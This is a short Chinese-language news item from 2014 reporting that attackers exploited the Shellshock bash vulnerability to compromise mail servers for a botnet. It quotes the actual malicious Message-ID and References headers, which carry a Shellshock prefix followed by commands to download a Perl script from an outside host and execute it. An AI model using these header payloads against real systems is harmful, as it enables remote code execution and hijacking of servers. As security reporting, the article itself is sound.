攻击者利用Shellshock漏洞入侵邮件服务器_最新动态

您所在的位置：程序员俱乐部 > 新闻资讯 > 最新动态 > 攻击者利用Shellshock漏洞入侵邮件服务器

攻击者利用Shellshock漏洞入侵邮件服务器

2014/10/29 4:28:52 程序员俱乐部我要评论(0)

摘要：攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求，诱骗bash远程执行命令。安全研究人员报告，攻击者向邮件服务器发送特定的消息头字段，诱骗服务器执行一个Perl脚本，成为僵尸网络的一部分。邮件消息头的构成是：Message-ID:(){:;};wget-O/tmp/.legendhxxp://190-94-251-41/legend.txt;killall-9perl
标签：邮件利用服务器攻击服务漏洞

　　攻击者正利用上个月披露的 Shellshock 漏洞入侵邮件服务器建立僵尸网络。Shellshock 漏洞是指攻击者向使用 bash 的 Unix/Linux 服务器发送精心构造的请求，诱骗 bash 远程执行命令。安全研究人员报告，攻击者向邮件服务器发送特定的消息头字段，诱骗服务器执行一个 Perl 脚本，成为僵尸网络的一部分。邮件消息头的构成是：

Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

上一篇：《2600》：面向黑客的印刷杂志下一篇：【揭秘】星巴克Starbucks首席数字官